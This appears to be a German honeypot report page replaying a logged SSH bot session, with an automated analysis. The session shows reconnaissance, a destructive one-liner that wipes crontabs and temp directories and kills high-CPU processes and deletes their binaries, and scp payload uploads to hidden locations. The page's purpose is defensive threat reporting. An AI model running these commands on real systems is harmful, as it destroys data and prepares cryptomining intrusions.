ALLSmartSecurity
Mitschnitt

SSH-Angriff aus Frankreich: Schadcode nachladen und Einnisten per Cronjob

04.10.2026, 05:11 UTC · 967 Befehle · über ssh · Frankreich · 2× wiederholt

Überblick

Dienst
ssh (Port 22)
Herkunft
Frankreich · BANATSYNC SRL
Probierte Zugangsdaten
username / 123456
Gleiche Sitzung gesehen
2×

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
username@srv01: ~

username@srv01:~$ uname -s -v -n -r -m
Linux 4.15.0-213-generic #213-Ubuntu SMP Fri Jan 15 10:52:24 UTC 2021 x86_64
username@srv01:~$ uname -m | awk '{printf $1}'
x86_64
username@srv01:~$ uptime | grep -ohe 'up .*' | sed 's/,//g' | awk '{ print $2" "$3 }'
up 8 days, 03:45
username@srv01:~$ lspci | egrep VGA && lspci | grep 3D
00:02.0 VGA compatible controller: Intel Corporation Xeon E3-1200 v5/E3-1200 v6 | 3rd Generation Core (Intel 4th Gen) Integrated Graphics Controller (rev 06)
username@srv01:~$ lscpu | egrep "Model name:" | cut -d ' ' -f 14-
Intel(R) Xeon(R) CPU E5-2620 v4 @ 2.10GHz
username@srv01:~$ curl ipinfo.io/org
AS140612
username@srv01:~$ nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | wc -l | head -c 1
bash: nvidia-smi: command not found
username@srv01:~$ nvidia-smi -q | grep "Product Name"
bash: nvidia-smi: command not found
username@srv01:~$ lspci | egrep VGA | grep Radeon | wc -l | head -c 1
0
username@srv01:~$ uname -n | awk '{printf $1}'
srv01
username@srv01:~$ uname -r | awk '{printf $1}'
4.15.0-213-generic
username@srv01:~$ crontab -r ; rm -rf /var/tmp/.* /var/tmp/* /tmp/.* /tmp/* ; ps aux | awk '$3 > 40.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; done ; ps aux | awk '$4 > 60.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; d…
bash: pidof: command not found
bash: pkill: command not found
username@srv01:~$ echo 123456 > /tmp/d.log
username@srv01:~$ scp -qt "/var/tmp/kfWxHFvq"
username@srv01:~$ scp -qt "/tmp/kfWxHFvq"
username@srv01:~$ scp -qt "/dev/shm/kfWxHFvq"
username@srv01:~$ uname -s -v -n -r -m
Linux 4.15.0-213-generic #213-Ubuntu SMP Fri Jan 15 10:52:24 UTC 2021 x86_64
username@srv01:~$ echo qwe@123 > /tmp/d.log
username@srv01:~$ scp -qt "/var/tmp/mNeapmzP"
username@srv01:~$ scp -qt "/tmp/mNeapmzP"
username@srv01:~$ scp -qt "/dev/shm/mNeapmzP"
username@srv01:~$ uname -s -v -n -r -m
Linux 4.15.0-213-generic #213-Ubuntu SMP Fri Jan 15 10:52:24 UTC 2021 x86_64
username@srv01:~$ echo 1234qwer > /tmp/d.log
username@srv01:~$ scp -qt "/var/tmp/gTqBOGTE"
username@srv01:~$ scp -qt "/tmp/gTqBOGTE"
username@srv01:~$ scp -qt "/dev/shm/gTqBOGTE"
username@srv01:~$ uname -s -v -n -r -m
Linux 4.15.0-213-generic #213-Ubuntu SMP Fri Jan 15 10:52:24 UTC 2021 x86_64
username@srv01:~$ uname -s -v -n -r -m
Linux 4.15.0-213-generic #213-Ubuntu SMP Fri Jan 15 10:52:24 UTC 2021 x86_64
username@srv01:~$ uname -s -v -n -r -m
Linux 4.15.0-213-generic #213-Ubuntu SMP Fri Jan 15 10:52:24 UTC 2021 x86_64
username@srv01:~$ uname -s -v -n -r -m
Linux 4.15.0-213-generic #213-Ubuntu SMP Fri Jan 15 10:52:24 UTC 2021 x86_64
username@srv01:~$ uname -s -v -n -r -m
Linux 4.15.0-213-generic #213-Ubuntu SMP Fri Jan 15 10:52:24 UTC 2021 x86_64
username@srv01:~$ scp -qt "/var/tmp/PFSboGLB"
username@srv01:~$ scp -qt "/tmp/PFSboGLB"
username@srv01:~$ scp -qt "/dev/shm/PFSboGLB"
username@srv01:~$ uname -s -v -n -r -m
Linux 4.15.0-213-generic #213-Ubuntu SMP Fri Jan 15 10:52:24 UTC 2021 x86_64
username@srv01:~$ uname -s -v -n -r -m
Linux 4.15.0-213-generic #213-Ubuntu SMP Fri Jan 15 10:52:24 UTC 2021 x86_64
username@srv01:~$ uname -s -v -n -r -m
Linux 4.15.0-213-generic #213-Ubuntu SMP Fri Jan 15 10:52:24 UTC 2021 x86_64
username@srv01:~$ uname -s -v -n -r -m
Linux 4.15.0-213-generic #213-Ubuntu SMP Fri Jan 15 10:52:24 UTC 2021 x86_64
username@srv01:~$ uname -s -v -n -r -m
Linux 4.15.0-213-generic #213-Ubuntu SMP Fri Jan 15 10:52:24 UTC 2021 x86_64

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Der Angreifer meldete sich mit schwachen Standardzugangsdaten über SSH an. Er führte eine Reihe von Systemabfragen aus, um Hardwareinformationen wie CPU, GPU und Netzwerkdetails zu sammeln. Anschließend versuchte er, temporäre Dateien zu löschen, Prozesse mit hoher CPU-Auslastung zu beenden und mehrere Dateien über SCP in verschiedene temporäre Verzeichnisse zu kopieren.

Was die Befehle bewirken

Die Befehle uname, lscpu und lspci identifizieren Betriebssystem, Kernel und Hardwarekomponenten. Der curl-Befehl auf ipinfo.io ermittelt die geografische Lage und den Anbieter des Zielsystems. Das Kommando crontab -r löscht geplante Aufgaben, während rm -rf temporäre Dateien entfernt. Der awk-Befehl filtert Prozesse mit hoher CPU- oder Speichernutzung, um diese zu beenden, was auf die Beseitigung konkurrierender Mining-Prozesse hindeutet. Die scp-Befehle versuchen, Dateien in versteckte oder flüchtige Speicherorte wie /dev/shm zu übertragen.

Worauf es hinauslief

Das Verhalten deutet stark auf die Vorbereitung eines Kryptomining-Angriffs hin. Die Abfrage von Grafikkarten (NVIDIA, Radeon) und CPU-Modellen dient der Bewertung der Mining-Effizienz. Das Beenden ressourcenintensiver Prozesse und das Löschen temporärer Dateien sind typische Schritte, um Konkurrenz durch andere Miner zu entfernen und Platz für eigene Malware zu schaffen.

Einordnung

Dieses Muster ist bei automatisierten Botnetzen zur Installation von Kryptomining-Malware sehr verbreitet. Die Kombination aus Hardware-Scanning und dem Entfernen konkurrierender Prozesse ist ein klassisches Indiz für Mining-Bots.